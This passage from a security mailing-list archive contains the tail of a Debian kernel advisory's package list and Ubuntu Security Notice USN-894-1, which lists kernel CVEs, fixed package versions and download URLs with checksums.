75c044fa17d6071de36579a1491c2e1b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  3431908 18825f85900faca81b21e48d43af6ee7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   197006 0a44248e77ec1ff027edd032ebe5b2c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  1503494 bd7f7b7bd4e120472bf60ad0b7d9184e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   196810 f03114c2f256a97b15f88d2659f9501b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83428 1ea7179752fbb45e10e731991583db68\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   263546 ef894d6917cbe692ec9197048538d5e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:  3651402 a0194c650712040f81e97d5b3b62bc79\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   264892 0b642e20f00b52c20b6ae9e0ee1f78b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83442 6d109d7f131dab564736e2ac6a85dd29\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7\n\n  These changes will probably be included in the oldstable distribution on\n  its next update. ===========================================================\nUbuntu Security Notice USN-894-1          February 05, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,\nCVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,\nCVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.82\n  linux-image-2.6.15-55-686       2.6.15-55.82\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82\n  linux-image-2.6.15-55-hppa32    2.6.15-55.82\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82\n  linux-image-2.6.15-55-hppa64    2.6.15-55.82\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-itanium   2.6.15-55.82\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82\n  linux-image-2.6.15-55-k7        2.6.15-55.82\n  linux-image-2.6.15-55-mckinley  2.6.15-55.82\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc   2.6.15-55.82\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-server    2.6.15-55.82\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82\n  linux-image-2.6.15-55-sparc64   2.6.15-55.82\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.65\n  linux-image-2.6.24-27-generic   2.6.24-27.65\n  linux-image-2.6.24-27-hppa32    2.6.24-27.65\n  linux-image-2.6.24-27-hppa64    2.6.24-27.65\n  linux-image-2.6.24-27-itanium   2.6.24-27.65\n  linux-image-2.6.24-27-lpia      2.6.24-27.65\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65\n  linux-image-2.6.24-27-mckinley  2.6.24-27.65\n  linux-image-2.6.24-27-openvz    2.6.24-27.65\n  linux-image-2.6.24-27-powerpc   2.6.24-27.65\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-rt        2.6.24-27.65\n  linux-image-2.6.24-27-server    2.6.24-27.65\n  linux-image-2.6.24-27-sparc64   2.6.24-27.65\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-virtual   2.6.24-27.65\n  linux-image-2.6.24-27-xen       2.6.24-27.65\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.45\n  linux-image-2.6.27-17-server    2.6.27-17.45\n  linux-image-2.6.27-17-virtual   2.6.27-17.45\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.59\n  linux-image-2.6.28-18-imx51     2.6.28-18.59\n  linux-image-2.6.28-18-iop32x    2.6.28-18.59\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59\n  linux-image-2.6.28-18-lpia      2.6.28-18.59\n  linux-image-2.6.28-18-server    2.6.28-18.59\n  linux-image-2.6.28-18-versatile  2.6.28-18.59\n  linux-image-2.6.28-18-virtual   2.6.28-18.59\n\nUbuntu 9.10:\n  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21\n  linux-image-2.6.31-19-386       2.6.31-19.56\n  linux-image-2.6.31-19-generic   2.6.31-19.56\n  linux-image-2.6.31-19-generic-pae  2.6.31-19.56\n  linux-image-2.6.31-19-ia64      2.6.31-19.56\n  linux-image-2.6.31-19-lpia      2.6.31-19.56\n  linux-image-2.6.31-19-powerpc   2.6.31-19.56\n  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56\n  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-server    2.6.31-19.56\n  linux-image-2.6.31-19-sparc64   2.6.31-19.56\n  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-virtual   2.6.31-19.56\n  linux-image-2.6.31-211-dove     2.6.31-211.22\n  linux-image-2.6.31-211-dove-z0  2.6.31-211.22\n  linux-image-2.6.31-304-ec2      2.6.31-304.10\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nAmerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures.  Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions.  A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice.  Ubuntu 6.06 was not affected.  Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files.  Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \"print-fatal-signals\" reporting could show\narbitrary kernel memory contents. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames.  Only Ubuntu 9.04 and 9.10 were\naffected.  A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0291)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz\n      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc\n      Size/MD5:     2921 682576890de917043eccf6fc9398aed2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb\n      Size/MD5:    96386 b184441d2f44037554d037d217688393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49160 a512718368004f81e83063ea8972c871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36776 fcb0833daefa645545a2451824094b21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb\n      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   202666 71d8be83541874d6c675945838b9e223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49294 e4a805200acaaea274e67995602294e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    35158 0869bee234a54b1afe362123606efe66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    33806 ebf707126fa6326899d648786afa8779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb\n      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53554 afc415fd0a28c363579986fc48464671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     6024 